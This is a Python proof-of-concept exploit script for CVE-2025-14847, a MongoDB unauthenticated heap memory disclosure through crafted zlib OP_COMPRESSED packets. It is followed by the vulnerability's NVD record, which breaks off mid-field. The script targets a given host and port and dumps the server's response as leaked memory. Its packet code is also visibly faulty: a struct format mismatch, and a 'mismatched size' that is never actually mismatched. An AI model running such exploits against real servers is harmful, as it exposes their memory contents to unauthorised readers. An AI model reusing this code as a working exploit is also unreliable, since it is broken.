CVE-2025-14847

#!/usr/bin/env python3 """ CVE-2025-14847 PoC - MongoDB Heap Memory Disclosure via OP_COMPRESSED This PoC demonstrates the memory disclosure vulnerability in MongoDB's Zlib compressed protocol handling. Use only for authorized security testing. Reference: https://jira.mongodb.org/browse/SERVER-115508 """ import socket import struct import zlib def create_op_compressed_packet(declared_size, compressed_data): """ Create a MongoDB OP_COMPRESSED packet with mismatched length fields. OP_COMPRESSED format: - int32: messageLength (total message length including header) - int32: requestID (client-generated request identifier) - int32: responseTo (should be 0 for requests) - int32: opCode (2012 for OP_COMPRESSED) - int32: originalOpcode (the opcode of the original message) - int32: uncompressedSize (original uncompressed message size) - int8: compressorn (1 = snappy, 2 = zlib, 3 = zstd) - bytes: compressedData (the compressed data) """ opcode = 2012 # OP_COMPRESSED original_opcode = 2004 # OP_MSG compressor = 2 # zlib # Build the message body body = struct.pack('<iiii', original_opcode, len(compressed_data), compressor) + compressed_data # Calculate total message length (header is 16 bytes) message_length = 16 + len(body) # Build the packet with potentially mismatched declared size header = struct.pack('<iiii', message_length, 1, 0, opcode) return header + body def exploit_mongodb(target_host, target_port, target_version): """ Attempt to exploit CVE-2025-14847 to read uninitialized heap memory. """ print(f"[*] Targeting {target_host}:{target_port}") print(f"[*] MongoDB version: {target_version}") try: # Create a simple MongoDB wire protocol message original_msg = b'\x00\x00\x00\x00' # msg header original_msg += b'\x00' * 100 # padding to trigger heap allocation # Compress the message with zlib compressed = zlib.compress(original_msg) # Create exploit packet with mismatched size # The declared size will be different from actual compressed size packet = create_op_compressed_packet(len(compressed), compressed) print(f"[*] Sending crafted OP_COMPRESSED packet...") print(f"[*] Original size: {len(original_msg)}, Compressed size: {len(compressed)}") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_host, target_port)) # Send the exploit packet sock.send(packet) # Receive response (may contain leaked heap memory) response = sock.recv(4096) if response: print(f"[+] Received response ({len(response)} bytes)") print(f"[*] Response hex dump:") print(response[:256].hex()) sock.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": import sys if len(sys.argv) < 4: print("Usage: python3 cve_2025_14847_poc.py <host> <port> <version>") print("Example: python3 cve_2025_14847_poc.py 127.0.0.1 27017 7.0.15") sys.exit(1) exploit_mongodb(sys.argv[1], int(sys.argv[2]), sys.argv[3])

{"cve": {"id": "CVE-2025-14847", "sourceIdentifier": "[email protected]", "published": "2025-12-19T11:15:49.277", "lastModified": "2026-01-13T22:24:20.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mismatched length fields in Zlib compressed protocol headers may allow a read of uninitialized heap memory by an unauthenticated client. This issue affects all MongoDB Server v7.0 prior to 7.0.28 versions, MongoDB Server v8.0 versions prior to 8.0.17, MongoDB Server v8.2 versions prior to 8.2.3, MongoDB Server v6.0 versions prior to 6.0.27, MongoDB Server v5.0 versions prior to 5.0.32, MongoDB Server v4.4 versions prior to 4.4.30, MongoDB Server v4.2 versions greater than or equal to 4.2.0, MongoDB Server v4.0 versions greater than or equal to 4.0.0, and MongoDB Server v3.6 versions greater than or equal to 3.6.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "cisaExploitAdd": "2025-12-29", "cisaActionDue": "2026-01-19", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "MongoDB and MongoDB Server Improper Handling of Length Parameter Inconsistency Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-130"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6.0", "versionEndExcluding": "4.4.30", "matchCriteriaId": "2FCC5203-4E5E-4B2B-86A1-FD47A097013C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.32", "matchCriteriaId": "CCD1EB22-51EA-4ABC-9E0B-99520670133B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.0.27", "matchCriteriaId": "41ECB5AB-E6D0-412E-802F-839D53076677"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.28", "matchCriteriaId": "5C9277BB-90FC-4A57-9028-DD57322F1D44"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.17", "matchCriteriaId": "2F4D674D-CBC0-4412-AF68-6FED8A6394C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "8.2.0", "versionEndExcluding": "8.2.3", "matchCriteriaId": "4302991B-E6CF-4E7B-9B24-BD2355C6F393"}]}]}], "references": [{"url": "https://jira.mongodb.org/browse/SERVER-115508", "source": "[email protected]", "tags": ["Issue Tracking", "Patch", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/29/21", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing L ... (truncated)